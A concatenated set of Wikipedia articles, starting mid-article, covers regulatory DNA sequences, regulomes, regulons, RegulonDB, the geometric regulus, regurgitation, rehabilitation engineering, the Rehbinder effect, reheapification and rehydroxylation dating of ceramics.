Super-enhancers may occupy regions of the genome about 10,000 to 60,000 nucleotides long. [ 26 ] while typical enhancers are each about 204 base pairs long. [ 15 ] When 8 types of cells were evaluated, super-enhancers constituted between 2.5% to 10.9% of the enhancers driving transcription while typical enhancers were the majority of enhancers driving transcription. There were between 257 and 1,099 super-enhancers in these eight cell types and between 5,512 and 23,869 typical enhancers. [ 27 ]
While super-enhancers are only active at about 2.5% – 10.9 % of actively transcribed sites in a cell, they recruit transcription machinery more actively than at typical single enhancers. The super-enhancers in a cell utilize about 12% to 36% of the RNA polymerases, mediator proteins, BRD4 proteins, and other transcription machinery of the cell. [ 17 ]
5-Methylcytosine (5-mC) is a methylated form of the DNA base cytosine (see figure). 5-mC is an epigenetic marker found predominantly on cytosines within CpG dinucleotides, which consist of a cytosine is followed by a guanine reading in the 5' to 3' direction along the DNA strand ( CpG sites ). About 28 million CpG dinucleotides occur in the human genome. [ 28 ] In most tissues of mammals, on average, 70% to 80% of CpG cytosines are methylated (forming 5-methyl-CpG, or 5-mCpG). [ 29 ] Methylated cytosines within CpG sequences often occur in groups, called CpG islands . About 59% of promoter sequences have a CpG island while only about 6% of enhancer sequences have a CpG island. [ 30 ] CpG islands constitute regulatory sequences, since if CpG islands are methylated in the promoter of a gene this can reduce or silence gene expression. [ 31 ]
DNA methylation regulates gene expression through interaction with methyl binding domain (MBD) proteins, such as MeCP2, MBD1 and MBD2. These MBD proteins bind most strongly to highly methylated CpG islands . [ 32 ] These MBD proteins have both a methyl-CpG-binding domain and a transcriptional repression domain. [ 32 ] They bind to methylated DNA and guide or direct protein complexes with chromatin remodeling and/or histone modifying activity to methylated CpG islands. MBD proteins generally repress local chromatin by means such as catalyzing the introduction of repressive histone marks or creating an overall repressive chromatin environment through nucleosome remodeling and chromatin reorganization. [ 32 ]
Transcription factors are proteins that bind to specific DNA sequences in order to regulate the expression of a given gene. The binding sequence for a transcription factor in DNA is usually about 10 or 11 nucleotides long. There are approximately 1,400 different transcription factors encoded in the human genome, and they constitute about 6% of all human protein coding genes. [ 33 ] About 94% of transcription factor binding sites that are associated with signal-responsive genes occur in enhancers while only about 6% of such sites occur in promoters. [ 9 ]
EGR1 is a transcription factor important for regulation of methylation of CpG islands. An EGR1 transcription factor binding site is frequently located in enhancer or promoter sequences. [ 34 ] There are about 12,000 binding sites for EGR1 in the mammalian genome and about half of EGR1 binding sites are located in promoters and half in enhancers. [ 34 ] The binding of EGR1 to its target DNA binding site is insensitive to cytosine methylation in the DNA. [ 34 ]
While only small amounts of EGR1 protein are detectable in cells that are un-stimulated, EGR1 translation into protein at one hour after stimulation is markedly elevated. [ 35 ] Expression of EGR1 in various types of cells can be stimulated by growth factors, neurotransmitters, hormones, stress and injury. [ 35 ] In the brain, when neurons are activated, EGR1 proteins are upregulated, and they bind to (recruit) pre-existing TET1 enzymes, which are highly expressed in neurons. TET enzymes can catalyze demethylation of 5-methylcytosine. When EGR1 transcription factors bring TET1 enzymes to EGR1 binding sites in promoters, the TET enzymes can demethylate the methylated CpG islands at those promoters. Upon demethylation, these promoters can then initiate transcription of their target genes. Hundreds of genes in neurons are differentially expressed after neuron activation through EGR1 recruitment of TET1 to methylated regulatory sequences in their promoters. [ 34 ]
About 600 regulatory sequences in promoters and about 800 regulatory sequences in enhancers appear to depend on double-strand breaks initiated by topoisomerase 2β (TOP2B) for activation. [ 36 ] [ 37 ] The induction of particular double-strand breaks is specific with respect to the inducing signal. When neurons are activated in vitro , just 22 TOP2B-induced double-strand breaks occur in their genomes. [ 38 ] However, when contextual fear conditioning is carried out in a mouse, this conditioning causes hundreds of gene-associated DSBs in the medial prefrontal cortex and hippocampus, which are important for learning and memory. [ 39 ]
Such TOP2B-induced double-strand breaks are accompanied by at least four enzymes of the non-homologous end joining (NHEJ) DNA repair pathway (DNA-PKcs, KU70, KU80 and DNA LIGASE IV) (see figure). These enzymes repair the double-strand breaks within about 15 minutes to 2 hours. [ 38 ] [ 40 ] The double-strand breaks in the promoter are thus associated with TOP2B and at least these four repair enzymes. These proteins are present simultaneously on a single promoter nucleosome (there are about 147 nucleotides in the DNA sequence wrapped around a single nucleosome) located near the transcription start site of their target gene. [ 40 ]
The double-strand break introduced by TOP2B apparently frees the part of the promoter at an RNA polymerase–bound transcription start site to physically move to its associated enhancer. This allows the enhancer, with its bound transcription factors and mediator proteins, to directly interact with the RNA polymerase that had been paused at the transcription start site to start transcription. [ 38 ] [ 10 ]
Similarly, topoisomerase I (TOP1) enzymes appear to be located at many enhancers, and those enhancers become activated when TOP1 introduces a single-strand break. [ 41 ] TOP1 causes single-strand breaks in particular enhancer DNA regulatory sequences when signaled by a specific enhancer-binding transcription factor. [ 41 ] Topoisomerase I breaks are associated with different DNA repair factors than those surrounding TOP2B breaks. In the case of TOP1, the breaks are associated most immediately with DNA repair enzymes MRE11 , RAD50 and ATR . [ 41 ]
Genomes can be analyzed systematically to identify regulatory regions. [ 42 ] Conserved non-coding sequences often contain regulatory regions, and so they are often the subject of these analyses.
Regulatory sequences for the insulin gene are: [ 43 ] | https://en.wikipedia.org/wiki/Regulatory_sequence |
Regulome refers to the whole set of regulatory components in a cell . [ 1 ] Those components can be regulatory elements, genes , mRNAs , proteins , and metabolites . The description includes the interplay of regulatory effects between these components, and their dependence on variables such as subcellular localization , tissue , developmental stage, and pathological state.
One of the major players in cellular regulation are transcription factors , proteins that regulate the expression of genes. [ 2 ] Other proteins that bind to transcription factors to form transcriptional complexes might modify the activity of transcription factors, for example blocking their capacity to bind to a promoter .
Signaling pathways are groups of proteins that produce an effect in a chain that transmit a signal from one part of the cell to another part, for example, linking the presence of substance at the exterior of the cell to the activation of the expression of a gene.
High-throughput technologies for the analysis of biological samples (for example, DNA microarrays , proteomics analysis) allow the measurement of thousands of biological components such as mRNAs, proteins, or metabolites. [ 3 ] Chromatin immunoprecipitation of transcription factors can be used to map transcription factor binding sites in the genome. [ 4 ]
Such techniques allow researchers to study the effects of particular substances and/or situations on a cellular sample at a genomic level (for example, by addition of a drug, or by placing cells in a situation of stress). The information obtained allows parts of the regulome to be inferred.
One of the objectives of systems biology is the modeling of biological processes using mathematics and computer simulation . [ 5 ] The production of data from techniques of genomic analysis is not always amenable to interpretation mainly due to the complexity of the data and the large number of data points. Modeling can handle the data and allow to test a hypothesis (for example, gene A is regulated by protein B) that can be verified experimentally.
The complete knowledge of the regulome will allow researchers to model cell behaviour entirely. This will facilitate the design of drugs for therapy, [ 6 ] the control of stem cell differentiation, and the prognosis of disease . | https://en.wikipedia.org/wiki/Regulome |
In molecular genetics , a regulon is a group of genes that are regulated as a unit, generally controlled by the same regulatory gene that expresses a protein acting as a repressor or activator . This terminology is generally, although not exclusively, used in reference to prokaryotes , whose genomes are often organized into operons ; the genes contained within a regulon are usually organized into more than one operon at disparate locations on the chromosome . [ 1 ] Applied to eukaryotes , the term refers to any group of non-contiguous genes controlled by the same regulatory gene. [ 2 ]
A modulon is a set of regulons or operons that are collectively regulated in response to changes in overall conditions or stresses, but may be under the control of different or overlapping regulatory molecules. The term stimulon is sometimes used to refer to the set of genes whose expression responds to specific environmental stimuli. [ 1 ]
Commonly studied regulons in bacteria are those involved in response to stress such as heat shock . The heat shock response in E. coli is regulated by the sigma factor σ32 ( RpoH ), whose regulon has been characterized as containing at least 89 open reading frames . [ 3 ]
Regulons involving virulence factors in pathogenic bacteria are of particular research interest; an often-studied example is the phosphate regulon in E. coli , which couples phosphate homeostasis to pathogenicity through a two-component system . [ 4 ] Regulons can sometimes be pathogenicity islands . [ 5 ]
The Ada regulon in E. coli is a well-characterized example of a group of genes involved in the adaptive response form of DNA repair . [ 6 ]
Quorum sensing behavior in bacteria is a commonly cited example of a modulon or stimulon, [ 7 ] though some sources describe this type of intercellular auto-induction as a separate form of regulation. [ 1 ]
Changes in the regulation of gene networks are a common mechanism for prokaryotic evolution . An example of the effects of different regulatory environments for homologous proteins is the DNA-binding protein OmpR , which is involved in response to osmotic stress in E. coli but is involved in response to acidic environments in the close relative Salmonella Typhimurium . [ 8 ] | https://en.wikipedia.org/wiki/Regulon |
RegulonDB is a database of the regulatory network of gene expression in Escherichia coli K-12 . [ 1 ] [ 2 ] RegulonDB also models the organization of the genes in transcription units, operons and regulons . A total of 120 sRNAs with 231 total interactions which all together regulate 192 genes are also included. RegulonDB was founded in 1998 and also contributes data to the EcoCyc database.
In bacteria , such as E. coli , genes, are regulated by sequence elements in promoters and related binding sites). RegulonDB provides a database of such regulatory elements, their binding sites and the transcription factors that bind to these sites in E. coli . RegulonDB 9.0 includes 184 experimentally determined transcription factors (TFs) as well as 120 computationally predicted TFs, that is, a total of 304.
The complete repertoire of 189 genetic sensory-response units (GENSOR units) are reported, integrating their signal, regulatory interactions, and metabolic pathways. A total of 78 GENSOR units have their four components highlighted; 119 include the genetic switch and the response, and 2 contain only the genetic switch.
A total of 103 TFs have a known effector in RegulonDB, including 25 two-component systems . There were enough sites to build a motif for 93 TFs to infer 16,207 predicted TF binding sites. This set of predicted binding sites corresponds to 12,574 TF → gene regulatory interactions; this represents a recovery of 52% of the 1592 annotated regulatory interactions in the database for the 93 TFs for which RegulonDB has a position-weight matrix (PWM). If only TFs with a good-quality PWM are taken into account, the total number of predicted TF → gene interactions is 8,714, recovering 672 (57%) of annotated interactions for this TF subset. Semi-automatic curation produced a total of 3,195 regulatory interactions for 199 TFs.
Check the glossary for all definitions .
A transcription unit is a set of one or more genes transcribed from a single promoter. A TU may also include regulatory protein binding sites affecting this promoter and a terminator. A complex operon with several promoters contains, therefore, several transcription units. A transcription unit must include all the genes in an operon.
A promoter is defined in RegulonDB as the nucleotide sequence 60 bases upstream and 20 downstream from the precise initiation of transcription or +1. Terminators are regions where transcription ends, and RNA Polymerase unbinds from DNA .
The TFs binding sites are physical DNA sites recognized by transcription factors within a genome, including enhancer , upstream activator (UAS) and operator sites that may bind repressors or activators .
The graphic display of an operon contains all the genes of its different transcription units, as well as all the regulatory elements involved in the transcription and regulation of those TUs. An operon is here conceived as a structural unit encompassing all genes and regulatory elements. An operon with several promoters located near each other may also have dual binding sites, indicating that such a site can activate one particular promoter, but repress a second one.
In the same page, the collection of the different TUs is displayed below the operon. The graphic display of an operon contains all the genes of its different transcription units, as well as all the regulatory elements involved in the transcription and regulation of those TUs.
The graphic display of a TU will always contain only one promoter -when known- with the binding sites that regulate its activity, followed by the transcribed genes. Note that dual sites are frequently displayed at a TU as repressors or activators. This is because the site will have a particular effect on the promoter of that TU. | https://en.wikipedia.org/wiki/RegulonDB |
In three-dimensional space, a regulus R is a set of skew lines , every point of which is on a transversal which intersects an element of R only once, and such that every point on a transversal lies on a line of R .
The set of transversals of R forms an opposite regulus S . In R 3 {\displaystyle \mathbb {R} ^{3}} the union R ∪ S is the ruled surface of a hyperboloid of one sheet .
Three skew lines determine a regulus:
According to Charlotte Scott , "The regulus supplies extremely simple proofs of the properties of a conic...the theorems of Chasles, Brianchon , and Pascal ..." [ 2 ]
In a finite geometry PG(3, q ), a regulus has q + 1 lines. [ 3 ] For example, in 1954 William Edge described a pair of reguli of four lines each in PG(3,3). [ 4 ]
Robert J. T. Bell described how the regulus is generated by a moving straight line. First, the hyperboloid x 2 a 2 + y 2 b 2 − z 2 c 2 = 1 {\displaystyle {\frac {x^{2}}{a^{2}}}+{\frac {y^{2}}{b^{2}}}-{\frac {z^{2}}{c^{2}}}\ =\ 1} is factored as
Then two systems of lines, parametrized by λ and μ satisfy this equation:
No member of the first set of lines is a member of the second. As λ or μ varies, the hyperboloid is generated. The two sets represent a regulus and its opposite. Using analytic geometry , Bell proves that no two generators in a set intersect, and that any two generators in opposite reguli do intersect and form the plane tangent to the hyperboloid at that point. (page 155). [ 5 ] | https://en.wikipedia.org/wiki/Regulus_(geometry) |
Regurgitation is the expulsion of material from the pharynx , or esophagus , usually characterized by the presence of undigested food or blood. [ 1 ]
Regurgitation is used by a number of species to feed their young. [ 2 ] This is typically in circumstances where the young are at a fixed location and a parent must forage or hunt for food, especially under circumstances where the carriage of small prey would be subject to robbing by other predators or the whole prey is larger than can be carried to a den or nest. Some bird species also occasionally regurgitate pellets of indigestible matter such as bones and feathers. [ 3 ]
It is in most animals a normal and voluntary process unlike the complex vomiting reflex in response to toxins.
In humans it can be voluntary or involuntary, the latter being due to a small number of disorders. Regurgitation of a person's meals following ingestion is known as rumination syndrome , an uncommon and often misdiagnosed motility disorder that affects eating. It may be a symptom of gastroesophageal reflux disease (GERD). [ 4 ]
In infants, regurgitation – or spitting up – is quite common, with 67% of 4-month-old infants spitting up more than once per day. [ 5 ]
Some people are able to regurgitate without using any external stimulation or drug, by means of muscle control. Practitioners of yoga have also been known to do this. [ 6 ] Professional regurgitators perfect the ability to such a degree as to be able to exploit it as entertainment. [ 7 ] [ 8 ]
For birds that transport food to their mates and/or their young over long distances — especially seabirds — it is impractical to carry food in their bills because of the risk that it would be stolen by other birds, such as frigatebirds , skuas and gulls . Such birds often employ a regurgitative feeding strategy. Many species of gulls have an orange to red spot near the end of the bill (called a "subterminal spot") that the chicks peck in order to stimulate regurgitation.
All of the Suliformes employ a regurgitative strategy to feed their young. In some species — such as the blue-footed booby , masked booby , and the Nazca booby — a brood hierarchy exists, in which the older chick is fed before the younger, subordinate chick. In times when food is scarce, siblicide may occur, where the dominant chick kills its younger sibling in order to sequester all of the resources of the parents. [ 9 ] Penguins chicks are fed regurgitated food by both parents. [ 10 ] [ 11 ] Researchers found that the practice may potentially cause metabolic alkalosis in certain penguins. [ 12 ]
Some birds, such as fulmars , employ regurgitation as a defense when threatened.
Ruminants regurgitate their food as a normal part of digestion. During their idle time, they chew the regurgitated food ( cud ) and swallow it again, which increases digestibility by reducing particle size. [ citation needed ]
Honey is produced by a process of regurgitation by honey bees , which is stored in the beehive as a primary food source. | https://en.wikipedia.org/wiki/Regurgitation_(digestion) |
Rehabilitation engineering is the systematic application of engineering sciences to design, develop, adapt, test, evaluate, apply, and distribute technological solutions to problems confronted by individuals with disabilities. These individuals may have experienced a spinal cord injury, brain trauma, or any other debilitating injury or disease (such as multiple sclerosis, Parkinson's, West Nile, ALS , etc.). Functional areas addressed through rehabilitation engineering may include mobility, communications, hearing, vision, and cognition, and activities associated with employment, independent living, education, and integration into the community. [ 1 ]
Rehabilitation Engineering and Assistive Technology Society of North America , the association and certifying organization of professionals within the field of Rehabilitation Engineering and Assistive Technology in North America, defines the role of a Rehabilitation Engineer as well as the role of a Rehabilitation Technician, Assistive Technologist, and Rehabiltiation Technologist (not all the same) in the 2017 approved White Paper available online on their website. [ 2 ] [ 3 ]
While some rehabilitation engineers have master's degrees in rehabilitation engineering, usually a subspecialty of Biomedical engineering , most rehabilitation engineers have undergraduate or graduate degrees in biomedical engineering , mechanical engineering , or electrical engineering . A Portuguese university provides an undergraduate degree and a master's degree in Rehabilitation Engineering and Accessibility. [ 4 ] [ 5 ]
In the UK, there are 3 recognised training routes into Rehabilitation Engineering:
In the UK, there are 3 professional registration bodies for Rehabilitation Engineers:
Many of the Rehabilitation Engineering professionals join multidisciplinary scientific and technical associations with a common interest in the field of Assistive Technology and Accessibility. Examples are RESNA - Rehabilitation Engineering and Assistive Technology Society of North America , RESJA - Rehabilitation Engineering Society of JAPAN , AAATE - Association for the Advancement of Assistive Technology in Europe , ARATA – Australian Rehabilitation & Assistive Technology Association , AITADIS - Asociación Iberoamericana de Tecnologías de Apoyo a la Discapacidad and SUPERA – Portuguese Society of Rehabilitation Engineering, Assistive Technologies and Accessibility .
Other organizations, like RESMAG and the National Committee on Rehabilitation Engineering of Engineers Australia are also committed to developing and providing resources that support the practice of rehabilitation engineers.
The Rehabilitation Engineering and Assistive Technology Society of North America (RESNA), whose mission is to "improve the potential of people with disabilities to achieve their goals through the use of technology", is one of the main professional societies for rehabilitation engineers. [ 7 ] RESNA's annual conference is held in the Washington, D.C., area in July.
UK Professional Bodies for Clinical Scientists in Rehabilitation Engineering:
The rehabilitation process for people with disabilities often entails mechanical design of assistive devices such as Walking aids intended to promote inclusion of their users into the mainstream of society, commerce, and recreation. Device development can range from purely mechanical to mechatronics and software.
Within the National Health Service of the United Kingdom Rehabilitation Engineers are commonly involved with assessment and provision of wheelchairs and seating to promote good posture and independent mobility. This includes electrically powered wheelchairs, active user (lightweight) manual wheelchairs, and in more advanced clinics this may include assessments for specialist wheelchair control systems and/or bespoke seating solutions.
The A-SET Mind Controlled Wheelchair has been invented by Diwakar Vaish , the head of Robotics and Research at A-SET Training and Research Institutes, India. It is of great importance to patients with locked-in syndrome , it uses neural signals to command the wheelchair. This is the world's first in production neurally controlled wheelchair.
Many of these devices are not designed to be multi-functional or to be easy to use. [ 8 ]
Rehabilitation Engineering Research Centers conduct research in the rehabilitation engineering, each focusing on one general area or aspect of disability. [ 9 ] For example, the Smith-Kettlewell Eye Research Institute conducts research for the blind and visually impaired . [ 10 ] Many of the Veterans Administration Rehabilitation Research & Development Centers conduct rehabilitation engineering research. [ 11 ] | https://en.wikipedia.org/wiki/Rehabilitation_engineering |
In physics , the Rehbinder effect is the reduction in the hardness and ductility of a material, particularly metals, by a surfactant film. [ 1 ] The effect is named for Soviet scientist Piotr Aleksandrovich Rehbinder [ ru ] , [ 2 ] [ 3 ] who first described the effect in 1928. [ 4 ]
A proposed explanation for this effect is the disruption of surface oxide films, and the reduction of surface energy by surfactants. [ 1 ] [ 5 ]
The effect is of particular importance in machining , as lubricants reduce cutting forces. [ 5 ] [ 6 ]
This condensed matter physics -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Rehbinder_effect |
Reheapification is a term promoted by some C++ textbooks [ 1 ] to describe the process of fixing a binary search tree heap data structure , after a node is either removed or added. Other authors [ 2 ] refer to the process of bubble up or bubble down .
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Reheapification |
Rehydroxylation [RHX] dating is a developing method for dating fired-clay ceramics . [ 1 ] This new concept relies on a key property of ceramic materials, in which they expand and gain mass over time. After a ceramic specimen is removed from the kiln at the time of production, it immediately begins to recombine chemically with moisture from the environment. This reaction reincorporates hydroxyl (OH) groups into the ceramic material, and is described as rehydroxylation (RHX). [ 2 ] The phenomenon has been well-documented over the past one hundred years (albeit more focused on limited timescales), and has now been proposed as a means to date fired-clay ceramics. The RHX process produces an increase in specimen weight and this weight increase provides an accurate measure of the extent of rehydroxylation. The dating clock is provided by the experimental finding that the RHX reaction follows a precise kinetic law: the weight gain increases as the fourth root of the time which has elapsed since firing. [ 3 ] This power law and the RHX method which follows from it were discovered by scientists from the University of Manchester and the University of Edinburgh . [ 4 ]
The concept of RHX dating was first stated in 2003 by Wilson and collaborators [ 3 ] who noted that the "results … suggest a new method for archaeological dating of ceramics". The RHX method was then described in detail in 2009 [ 1 ] for brick and tile materials, and in relation to pottery in 2011. [ 5 ] The archaeological pottery first used to test the developing RHX method consisted of three categories of which the dates had already been calculated by other archaeological means. The first was an Anglo-Saxon loom-weight from 560 to 660 AD, a Samian-ware sherd from 45 to 75 AD and three Werra earthenware sherds from 1605 AD. [ 5 ] The types of samples used were deemed important for the experiment since they represented "three specific perceived issues associated with applying the RHX method to excavate archaeological pottery." [ 5 ] These issues included potsherds found in waterlogged sites, low-firing temperature ceramics, vitrified ceramics and those containing a slip or a glaze .
RHX dating is not yet routinely or commercially available. It is the subject of a number of research and validation studies in several countries.
The concept of clay ceramic expansion, post-firing, has been the object of discussion for a long time, first noted by Schurecht in 1928 [ 6 ] to explain crazing in ceramic glazes, and confirmed in 1954 by McBurney that this and the expansion of ceramic bodies is due to the intake of moisture from the environment. [ 7 ] Moisture expansion has since been an important property of clay ceramics to consider when using the material, such as clay bricks in constructions. In 2003, it was proposed that moisture expansion could extend over much longer periods of time, contrasting with the previous research over more limited time scales. [ 3 ] This was evaluated on bricks ranging from the Roman period to modern ones. It was ascertained that moisture expansion follows a power law : mass gain and expansion depend on time 1/4 across archaeological timescales. For example, if the weight of a fired-clay ceramic increases as a result of RHX by 0.1% in 1 year from firing, then the weight increase is 0.2% in 16 years, 0.3% in 81 years and 0.4% in 256 years (and so on). The reason behind this quartic root dependence is uncertain, however further research is being conducted to explain why, including NMR and IR spectroscopy . [ 8 ] Despite the uncertainty, enough previous research and other more recent data have indicated that the law is valid. [ 9 ] [ 10 ] with moisture expansion and weight gain being proportional to each other for a specified material at any specified firing temperature.
The basis of RHX dating depends on this power law.
First a small sample of the material is obtained. To do so, the ceramic artefact is wet cut using a water-cooled saw to avoid producing heat and consequently causing some dehydroxylation . [ 5 ] After this, any loose debris must be removed and this can be done by thoroughly cleaning it under running water. The sample is then heated to 105 °C until constant weight to remove all capillary water and loosely adsorbed water. Next, the sample is conditioned in a controlled environment to the estimated effective lifetime temperature (ELT) and relative humidity to obtain the RHX constant ( α {\displaystyle \alpha } ). [ 5 ] The ELT is generally close to (but not exactly the same as) the long-term annual mean surface air temperature. Finally, to completely remove all the water gained in the previous stage, the sample is heated to 500 °C for 4 hours until constant weight, which indicates that all the water has been lost and, therefore, has hypothetically returned to its original historical mass after removal from the kiln. [ 1 ] [ 5 ]
After the preparation of the sample is complete, it is transferred to a microbalance chamber and exposed to water vapour at a controlled temperature (identical to the first ELT) and relative humidity to determine the kinetics of the mass gain through recombination with water. Once this process has been carried out for the desired length of time (on average one to two days), the mass data are recorded. [ 1 ] [ 5 ]
Once the RHX rate is determined, it is possible to calculate exactly how long ago it was removed from the kiln, [ 4 ] and therefore assign a date to the material.
To determine the date of the material, the rate of the mass gain needs to be calculated using the following equation:
y = α ( T ) t 1 / 4 {\displaystyle y=\alpha (T)t^{1/4}} [ 1 ] [ 8 ]
where α {\displaystyle \alpha } is the mass gain rate constant, T {\displaystyle T} is temperature (the ELT) and t {\displaystyle t} is time. The older the sample, the greater the mass gained from combining chemically with water, since the initial mass of the sample is equal to the sum of that of the original fired material and the water combined with it over its lifetime. [ 1 ] From there, using other data obtained, the age is calculated using:
t α = [ m α α m 4 ] 4 {\displaystyle t_{\alpha }=[{\frac {m_{\alpha }}{\alpha m_{4}}}]^{4}} [ 8 ]
where t α {\displaystyle t_{\alpha }} is the time elapsed since the last historical firing (age of material), m α {\displaystyle m_{\alpha }} is the mass of hydroxyl groups, m 4 {\displaystyle m_{4}} is the hypothetical mass at complete dehydroxylation and α {\displaystyle \alpha } represents the rate constant. To ensure the date is accurate, either multiple samples from the same artefact can be taken and analysed, or the sample can be dated again using an alternative means and the results compared.
When developing the method, it was important to understand whether variations in humidity affect the RHX mass gain rate of the ceramic material. Little research had not yet examined this in-depth. Therefore, a study was carried out on samples from the XIX th and XX th centuries, [ 11 ] in which they dehydrated the samples to remove any physically and chemically bonded water and placed them in conditions which were varied between dry and humid extremes. The conclusion was that variations in humidity do not affect the kinetics of RHX since it only affects the physically bonded water content, rather than the chemically bonded hydroxyl ions. [ 11 ] This is because the RHX reaction occurs extremely slowly, and only minute amounts of water are required to feed it, with sufficient water being available in virtually all terrestrial environments. Neither systematic nor transient changes in humidity have an effect on long-term rehydroxylation kinetics. However, they do affect instantaneous gravimetric measurements or introduce systematic error, for example through capillary condensation . [ 11 ]
Changes in temperature can strongly affect the rate of RHX and this may impact the calculated age of the ceramic. To illustrate this, the hypothetical example of a 1000-year-old sample is used. [ 12 ] During the first 500 years, the ambient temperature remains at 10 °C; for the following 500 years, the temperature increases to 15 °C. Therefore, after the first 500 years, the rate of RHX increases. The mass of the material also begins to increase at a faster rate than previously. [ 12 ] Thus, when calculating dates, scientists must be able to estimate the temperature history of the sample. The method of calculation is based on temperature data for the location, with adjustments for burial depth and long-term temperature variation from historical records, [ 12 ] such as seasonal and climatic changes. This information is used to estimate an effective lifetime temperature or ELT which is then used in the dating calculation. [ 5 ] Recognition of the effects of changes in temperature is vital since reheating the material to a high enough temperature causes the ceramic to lose some or all of the water gained since the original firing, thus affecting the age calculated. [ 13 ] For example, a medieval brick examined by Wilson and her colleagues [ 1 ] produced a date of 66 years, instead of the expected earlier date. Closer analysis revealed that the exterior of the brick contained vitrified elements, indicating that it had been exposed to extreme heat since the original time of firing. This was due to the brick having been dehydroxylated by the intense heat of incendiary bombing and fires during World War II . [ 14 ] To avoid this type of error or confirm the calculated date, archaeological methods can be used alongside RHX dating, such as stratigraphic dating , radiocarbon dating or other archaeological methods.
The main application of the RHX technique is to date archaeological ceramics. Yet most archaeological material contains components which causes either addition mass gain or additional mass loss during the RHX measurement process. [ 15 ] These components can be an intrinsic part of the object, for example materials added as temper, or compounds which have become incorporated into the object during use, such as organic residues, or other elements which have entered into the object during burial or conservation. Removing the contaminants without affecting the RHX technique is currently being researched. The method deemed the most effective out of the others tested consisted of an acid-base treatment, using hydrochloric acid (HCl) to clean the samples, followed by a solution of hydrogen peroxide (H 2 O 2 ) to oxidise them. [ 16 ] Since RHX dating has yet to become a key part of dating ceramic artefacts due to its very recent development, the residues on the outside/inside of the ceramic can be dated using other methods, including radiocarbon, Thermoluminescence (TL) , Optically Stimulated Luminescence (OSL) and Electron Paramagnetic Resonance (EPR) . [ 8 ]
The RHX technique was the product of a three-year study by a collaboration of University of Manchester and University of Edinburgh researchers, led by Moira Wilson. Though it has only been established on bricks and tiles of up to 2,000 years of age, research is continuing to determine whether RHX can be accurately used on any fired-clay material, for example earthenware of up to 10,000 years of age. [ 4 ] This is because the mass gain only approximates a 1-2% increase of the original mass of the material over the course of a few millennia. The potential capacity for further adsorption of water could extend to 10,000 years, since the kinetic power law on which the method relies remains true for large time scales. [ 1 ] Since the method remains under refinement, it is not yet a standard means of dating archaeological ceramics.
The original work of Wilson and co-workers was undertaken on construction materials, bricks and tiles. Transferring the method to ceramics has brought additional challenges but initial results have demonstrated that ceramics have the same “internal clock” as bricks. [ 17 ] Several other studies have attempted to replicate the RHX technique, [ 13 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] but using archaeological ceramics. These studies have encountered issues with components within the ceramics, including the mineralogy or the temper added to the clay, causing either addition mass gain or additional mass loss during the RHX measurement process. The quality of data generated by the Manchester and Edinburgh groups has been due to analysing fired-clay materials which do not contain these components. Efforts to successfully replicate the original work and overcome the challenges presented by archaeological ceramics are underway in several academic institutions worldwide.
One example of this research is a study from 2011 that was conducted on sherds of XIX th century Davenport ceramics excavated in Utah , United States of America to assess the validity of the original method, specifically the rate equation. The study confirmed that RHX dating is applicable to archaeological ceramics, with Bowen and his colleagues stating "the development of a refined expression for rehydration/RHX behaviour would allow a dramatic enhancement of the anthropological research questions currently being posed". [ 22 ] In spite of the success, they stressed that knowledge of the mineralogy of the sample is vital. [ 22 ] They noted that some minerals, such as illite , undergo dehydration and dehydroxylation reversibly; others, such as kaolinite , undergo this at varying temperatures since they vitrify. Therefore, in order to dehydrate the sample effectively, a suitable temperature needs to be chosen to avoid compromising the integrity of the sample components. It was also concluded that more research needed to be carried out to further examine the effects of mineralogy on RHX dating. [ 22 ]
A more recent analysis from 2017 on potsherds from southern Apulia , Italy proved the potential for the RHX method to become a reliable "alternative or ancillary" [ 21 ] means of dating ceramics. The samples used were fragments of Byzantine pottery which had been dated previously by association with other artefacts using radiocarbon analysis. Meanwhile, it was noted that since RHX dating has not been tested sufficiently, it cannot yet replace more conventional ways of dating pottery, such as radiocarbon which has extensive proof of its accuracy. The ages calculated for the Byzantine sherds through RHX dating were concurrent with the known ones. The study also emphasised the possible value of this method in refining chronological pottery seriation in cases where the pottery style remains similar over extended periods of time in a specific region, such as the Byzantine vessels examined. [ 21 ]
Overall, the RHX dating technique shows great potential within the field of Archaeology and research continues to allow for its use in more general studies. | https://en.wikipedia.org/wiki/Rehydroxylation_dating |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.